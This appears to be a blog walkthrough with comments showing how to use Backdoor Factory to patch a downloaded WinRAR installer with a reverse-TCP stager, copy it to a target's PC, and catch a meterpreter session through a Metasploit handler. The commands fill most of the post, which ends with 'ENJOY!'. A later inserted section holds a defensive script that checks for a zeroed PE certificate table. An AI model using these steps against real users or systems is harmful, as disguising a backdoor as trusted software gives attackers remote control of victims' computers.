Backdoor Factory

Backdoor-Factory is an exploitation tool. Its goal is to let you patch executable files.
Note, however, that some exe files are protected by default by their developers.
In this walkthrough we are going to patch a WinRAR file.

[LET'S MAKE IT WORK]

#1) Go to the WinRAR website and download the WinRAR version that you need for your target.
*Our target is a 32-bit Windows OS, so we are going to download the 32-bit WinRAR for Windows*

#2) Close the browser, open terminal & type:
assault@kalivm:~$ sudo backdoor-factory
assault@kalivm:~$ sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s show
*We downloaded the file into the Downloads folder. The -f option means file, -s means shell*
*We will get this output. We are going to use: iat_reverse_tcp_stager_threaded*

*Let’s continue*
*Type*
assault@kalivm:~$ sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080
*The -H option means host, the -P option means port*
*And we will get this output*
*Backdoor Factory asks us what we want to do. Let’s pick 1 – The .rsrc*

#3) Open terminal & navigate to:
assault@kalivm:~$ cd ~/backdoored/
assault@kalivm:~/backdoored$ ls
*Copy the wrar540.exe onto your target’s PC*

#4) Open a new terminal tab & type the following, one by one:
assault@kalivm:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.50.15
LHOST => 192.168.50.15
msf exploit (handler) > set LPORT 8080
LPORT => 8080
*Let’s type “show options” to see the “full picture”. If everything is OK, run exploit*
msf exploit (handler) > exploit
*Now, let’s run the wrar540.exe on the target’s PC – Once the target tries to install WinRAR, he will get this*

meterpreter >

ENJOY! 🙂
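
A defender-side check, added here as an example (not code from the original post or from Backdoor Factory): the tool output quoted in the comments below includes "Overwriting certificate table pointer", so a vendor-signed installer that has been through the patcher has that entry zeroed and no longer presents an Authenticode signature. This Python script reads that PE data directory entry; `sample_pe` builds constructed header-only input, and all function names are assumptions of this example.

```python
import struct
import sys

SECURITY_DIR = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY: the Authenticode certificate table

def certificate_table(data):
    """Return (file_offset, size) of the PE certificate table, or None if absent."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)       # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = pe_off + 24                 # 4-byte signature + 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):   # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    dirs = opt + (96 if magic == 0x10B else 112)           # start of data directories
    (count,) = struct.unpack_from("<I", data, dirs - 4)    # NumberOfRvaAndSizes
    if count <= SECURITY_DIR:
        return None
    offset, size = struct.unpack_from("<II", data, dirs + 8 * SECURITY_DIR)
    return (offset, size) if offset and size else None

def signature_status(data):
    """Classify a PE image by its certificate table entry (no signature validation)."""
    entry = certificate_table(data)
    if entry is None:
        return "no-certificate-table"
    offset, size = entry              # for this directory the "RVA" is a file offset
    return "certificate-table-present" if offset + size <= len(data) else "malformed"

def sample_pe(magic, cert_offset, cert_size, trailer=b""):
    """Constructed header-only PE image used as sample input (not a real installer)."""
    dirs = 96 if magic == 0x10B else 112
    opt = bytearray(dirs + 16 * 8)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, dirs - 4, 16)
    struct.pack_into("<II", opt, dirs + 8 * SECURITY_DIR, cert_offset, cert_size)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + trailer

if __name__ == "__main__":
    for path in sys.argv[1:]:         # e.g. the vendor download and the copy in use
        with open(path, "rb") as fh:
            print(path, signature_status(fh.read()))
```

A present certificate table is not proof of a valid signature; it only shows the entry has not been zeroed, so follow up with the platform's signature verification and a hash comparison against a copy obtained directly from the vendor.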

Here is an example by Gamer Forever

8 Comments on "Backdoor Factory"

  1. It shows me an error like

    [*] In the backdoor module
    [*] Checking if binary is supported
    [*] Gathering file info
    [*] Reading win64 entry instructions
    [*] Gathering file info
    [*] Overwriting certificate table pointer
    [*] Loading PE in pefile
    [*] Parsing data directories
    [*] Adding New Section for updated Import Table
    [!] Adding LoadLibraryA Thunk in new IAT
    [!] File has extra data after last section, cannot add new section

    • gamerforever | October 18, 2016 at 1:15 am |

      Hi.
      To help you, first I need to know some more basic details, like:
      1. Do you have Kali Linux 2.x or Kali 2016.x?
      2. Please type: sudo dpkg -s backdoor-factory
      What is your backdoor-factory version?
      3. What kind of exe file did you try to patch?

  2. Hi
    My Backdoor Factory version is 3.3.1-0kali1
    I use the winrar.exe file

    • gamerforever | October 23, 2016 at 9:54 am |

      Seems like you have Kali 2016.x
      I’ll be honest with you, I haven’t tried Kali 2016.x yet.
      BTW, is your Kali machine up to date with the latest update?
      And the winrar.exe file that you tried to patch, is it 32-bit or 64-bit?

  3. 64 bit

  4. I want to contact you to improve my hacking skills.

    • gamerforever | November 1, 2016 at 11:42 am |

      For help or questions, feel free to contact me through the website comments OR the YouTube channel (video comments\Discussion area).
      Thanks.
